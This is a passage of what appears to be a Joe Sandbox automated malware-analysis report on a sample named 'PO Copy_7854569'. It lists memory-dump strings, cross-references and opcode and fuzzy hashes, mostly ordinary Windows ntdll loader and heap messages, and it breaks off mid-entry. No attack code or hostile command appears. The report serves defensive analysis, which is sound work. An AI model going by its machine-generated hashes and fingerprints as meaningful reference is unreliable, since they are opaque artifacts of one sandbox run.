                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                            Strings
                            • VerifierDebug, xrefs: 016B8CA5
                            • AVRF: -*- final list of providers -*- , xrefs: 016B8B8F
                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 016B8A67
                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 016B8A3D
                            • HandleTraces, xrefs: 016B8C8F
                            • VerifierFlags, xrefs: 016B8C50
                            • VerifierDlls, xrefs: 016B8CBD
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                            Strings
                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 016899ED
                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01689A01
                            • apphelp.dll, xrefs: 01626496
                            • minkernel\ntdll\ldrinit.c, xrefs: 01689A11, 01689A3A
                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01689A2A
                            • LdrpInitShimEngine, xrefs: 016899F4, 01689A07, 01689A30
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                            Strings
                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 016A2180
                            • SXS: %s() passed the empty activation context, xrefs: 016A2165
                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 016A2178
                            • RtlGetAssemblyStorageRoot, xrefs: 016A2160, 016A219A, 016A21BA
                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016A21BF
                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 016A219F
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                            Strings
                            • LdrpInitializeImportRedirection, xrefs: 016A8177, 016A81EB
                            • Loading import redirection DLL: '%wZ', xrefs: 016A8170
                            • minkernel\ntdll\ldrredirect.c, xrefs: 016A8181, 016A81F5
                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 016A81E5
                            • LdrpInitializeProcess, xrefs: 0166C6C4
                            • minkernel\ntdll\ldrinit.c, xrefs: 0166C6C3
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                            APIs
                              • Part of subcall function 01672DF0: LdrInitializeThunk.NTDLL ref: 01672DFA
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01670BA3
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01670BB6
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01670D60
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01670D74
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                            • String ID:
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                            Strings
                            • @, xrefs: 01668591
                            • LdrpInitializeProcess, xrefs: 01668422
                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0166855E
                            • minkernel\ntdll\ldrinit.c, xrefs: 01668421
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                            Strings
                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016A22B6
                            • SXS: %s() passed the empty activation context, xrefs: 016A21DE
                            • .Local, xrefs: 016628D8
                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016A21D9, 016A22B1
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                            Strings
                            • RtlDeactivateActivationContext, xrefs: 016A3425, 016A3432, 016A3451
                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 016A342A
                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 016A3437
                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 016A3456
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                            Strings
                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01690FE5
                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0169106B
                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016910AE
                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01691028
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                            Strings
                            • LdrpDynamicShimModule, xrefs: 0169A998
                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0169A992
                            • apphelp.dll, xrefs: 01652462
                            • minkernel\ntdll\ldrinit.c, xrefs: 0169A9A2
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                            Strings
                            • HEAP: , xrefs: 01643264
                            • HEAP[%wZ]: , xrefs: 01643255
                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0164327D
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: $@
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: FilterFullPath$UseFilter$\??\
                            Strings
                            • LdrpCheckModule, xrefs: 0169A117
                            • Failed to allocated memory for shimmed module list, xrefs: 0169A10F
                            • minkernel\ntdll\ldrinit.c, xrefs: 0169A121
                            Similarity
                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                            Strings
                            Similarity
                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                            Strings
                            • LdrpInitializePerUserWindowsDirectory, xrefs: 016A82DE
                            • Failed to reallocate the system dirs string !, xrefs: 016A82D7
                            • minkernel\ntdll\ldrinit.c, xrefs: 016A82E8
                            Similarity
                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                            Strings
                            • @, xrefs: 016EC1F1
                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 016EC1C5
                            • PreferredUILanguages, xrefs: 016EC212
                            Similarity
                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                            Strings
                            Similarity
                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                            Strings
                            • LdrpCheckRedirection, xrefs: 016B488F
                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 016B4888
                            • minkernel\ntdll\ldrredirect.c, xrefs: 016B4899
                            Similarity
                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                            Strings
                            Similarity
                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                            Strings
                            • LdrpInitializationFailure, xrefs: 016B20FA
                            • Process initialization failed with status 0x%08lx, xrefs: 016B20F3
                            • minkernel\ntdll\ldrinit.c, xrefs: 016B2104
                            Similarity
                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                            APIs
                            Strings
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: #%u
                            Strings
                            • LdrResSearchResource Exit, xrefs: 0163AA25
                            • LdrResSearchResource Enter, xrefs: 0163AA13
                            Similarity
                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                            Strings
                            Similarity
                            • String ID: `$`
                            Strings
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: Legacy$UEFI
                            Strings
                            Similarity
                            • String ID: @$MUI
                            Strings
                            • kLsE, xrefs: 01630540
                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0163063D
                            Similarity
                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                            Strings
                            • RtlpResUltimateFallbackInfo Enter, xrefs: 0163A2FB
                            • RtlpResUltimateFallbackInfo Exit, xrefs: 0163A309
                            Similarity
                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                            Strings
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: Cleanup Group$Threadpool!
                            Strings
                            Similarity
                            • String ID: MUI
                            Strings
                            Similarity
                            • String ID: GlobalTags
                            Strings
                            Similarity
                            • String ID: .mui
                            Strings
                            Similarity
                            • String ID: EXT-
                            Strings
                            Similarity
                            • String ID: BinaryHash
                            Strings
                            Similarity
                            • String ID: #
                            Strings
                            Similarity
                            • String ID: BinaryName
                            Strings
                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 016B895E
                            Similarity
                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                            • Instruction ID: f7e38c9d0003ae6a67ee714691c4c30d855bbdcfb746cf644e1059370cd107e6
                            • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                            • Instruction Fuzzy Hash: 7DF15071E0021A9BDF55CF99DD80BAEBBFAAF48714F058169ED05AB340EB74D881CB50
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d7c4be990480833e5d285b3a74bb00f3c9785d1e00788b823eaad3ed9221d99a
                            • Instruction ID: 56db62ff87e23f0c0b97fa7c5d024bc1033ba976de55da559ef5f714ba618a7a
                            • Opcode Fuzzy Hash: d7c4be990480833e5d285b3a74bb00f3c9785d1e00788b823eaad3ed9221d99a
                            • Instruction Fuzzy Hash: 23D1F271A0061A9BDB25CFACCC41AFEB7FAEF88704F18816DD955A7241D735E902CB60
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b635203e910ecfaf9b1fa7dfa09a4691f5e841daf97ddab0235524e0d33bc81a
                            • Instruction ID: 90697f6ff687c2139d382f7e094ce34bd787a81404b3e21ef4f53b92d2963016
                            • Opcode Fuzzy Hash: b635203e910ecfaf9b1fa7dfa09a4691f5e841daf97ddab0235524e0d33bc81a
                            • Instruction Fuzzy Hash: D5E17B715083429FC715CF28C890A6ABBE1FFC9314F15896DE99587351DB31EA06CB92
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4d3cac99d4c1d5dde912a2500b253ba7e82a5f35e01de861cf3f0a8fb8ace237
                            • Instruction ID: 1054f6a63573bbeb78c5c10992a36a2f5157657e20a3617a0ef9137bc879c87d
                            • Opcode Fuzzy Hash: 4d3cac99d4c1d5dde912a2500b253ba7e82a5f35e01de861cf3f0a8fb8ace237
                            • Instruction Fuzzy Hash: 1FD1E471A00A269BDB14DF68CC90ABE77E9FF54308F05862DE916DB281E734E951CF60
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                            • Instruction ID: 01c0ec2323e02016d7234276d637a3e8b1780cf2080aa29193e9d9d995a9e4a1
                            • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                            • Instruction Fuzzy Hash: 6BB17275A006059FDB24DF99CD80AEBBBBEFF84304F10845DAA0297791DB34E985CB50
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                            • Instruction ID: 243604d6103d9df83428f01753523b5edfd5273f5b358f4958956973dcad8545
                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                            • Instruction Fuzzy Hash: 6BB1E771604656AFDF25DB68CD50BBEBBFAEF84200F144199E652DB381DB30E942CB90
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0b81f990c2b81478c2e95947b2f26689a981966e1e80135a8d397997b60dc81a
                            • Instruction ID: 83de35d55b845eca36f8f8f2333df8086ed63da815199a7b165b1437b6d07855
                            • Opcode Fuzzy Hash: 0b81f990c2b81478c2e95947b2f26689a981966e1e80135a8d397997b60dc81a
                            • Instruction Fuzzy Hash: 8FC14874108381CFDB64CF19C884BAAB7E9BF88314F54496DE98987391D774E909CF92
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c598311edacd0f8fd9899fd5893ff731b4a4bd9fdad69396455eb9047e54fa8c
                            • Instruction ID: 14cfdc8949904278688e21894fb82862fa8745292c321ad1b5e771bd7da41530
                            • Opcode Fuzzy Hash: c598311edacd0f8fd9899fd5893ff731b4a4bd9fdad69396455eb9047e54fa8c
                            • Instruction Fuzzy Hash: 70B16270A006668BDB74DF58CC90BADB3B2AF44704F0485EAD94AA7341EB70DD86CF25
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0421543fd1bde89ed7fd4463f587e5c7d4df07cac495ce89f85f7de6532f32a8
                            • Instruction ID: a0156f6b6279261bfeb38cb2fe29ad518c228304c29108b5f91a61ab45aa987a
                            • Opcode Fuzzy Hash: 0421543fd1bde89ed7fd4463f587e5c7d4df07cac495ce89f85f7de6532f32a8
                            • Instruction Fuzzy Hash: 9EA12531E00265EFEF21DF58CC44BAEBFA9AB04754F064195EE50AB381D7789E41CB91
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 14c2a51ad18b57bc4e164e7a0f81c42177529f377b3ce654f6df6c032bc52e57
                            • Instruction ID: 3d233140df3b3623e82e340494759ef8e466c96a7eaf89b1707bac31da7b5089
                            • Opcode Fuzzy Hash: 14c2a51ad18b57bc4e164e7a0f81c42177529f377b3ce654f6df6c032bc52e57
                            • Instruction Fuzzy Hash: 91A1C071B01616DBEB25CF69CD90BAAB7F1FF55318F104129EA0597385EB34E812CBA0
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c2bcd48c3e0a21b24f3dd462a608f08ee247c9909873f5f24926c0321e328f8f
                            • Instruction ID: 6629a8b2aeeb684b8aafff6312cccd36048de502df610bb7caf181eb840d48a4
                            • Opcode Fuzzy Hash: c2bcd48c3e0a21b24f3dd462a608f08ee247c9909873f5f24926c0321e328f8f
                            • Instruction Fuzzy Hash: 76A1AA72A04712EFC722DF18CD80B2ABBE9FB48704F15496DF6469B691D334E901CB95
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                            • Instruction ID: 39262de280691f8e0ccb716b7809257870fe8f428f554c213a8492c6d4355c18
                            • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                            • Instruction Fuzzy Hash: 2EB11672E0061ADFDF1ADFA9C884AADF7F5BF48310F148169E914A7292D730AD41CB94
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c00598d79926033ed2598d2e906f17204e854a574bc13e2014af39382e22e6ac
                            • Instruction ID: b036f742504b8250802d9100d758fd267db8916a18a64c0e93957f82cfb54482
                            • Opcode Fuzzy Hash: c00598d79926033ed2598d2e906f17204e854a574bc13e2014af39382e22e6ac
                            • Instruction Fuzzy Hash: 01919071D01216AFDB15CFA8DCC4BEEBFB5AF48710F154169EA11AB341D734E9808BA4
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d9c2061815996f6a172b5e3b6fdba882c73afb4b54a0770748fe76ac64d9862a
                            • Instruction ID: aee2251b6b0d40b636239a2196f8e6236efeeb6c42600321471af8b6267eec92
                            • Opcode Fuzzy Hash: d9c2061815996f6a172b5e3b6fdba882c73afb4b54a0770748fe76ac64d9862a
                            • Instruction Fuzzy Hash: 47911531A00616CBEB24DB68CC44BBDBBA6FF94714F15406EED059B340E73AD942C791
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: df8bba237719ae280ace1d1fdec8defe34c43865b008ba0ef8901c04fcb8e5dc
                            • Instruction ID: 3f5d27c8f77a305cb3e62128781089fb19746a5b7480db615f0d569bc7c8a34d
                            • Opcode Fuzzy Hash: df8bba237719ae280ace1d1fdec8defe34c43865b008ba0ef8901c04fcb8e5dc
                            • Instruction Fuzzy Hash: 64819071A006169BDB24DFA9CD40ABEBBF9FB48700F04862EE545E7640E734E951CBA4
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                            • Instruction ID: 3aaa01c17e12a6cd16c092039fa9cfb69ee24a290fc9affc1ad97673b075ca75
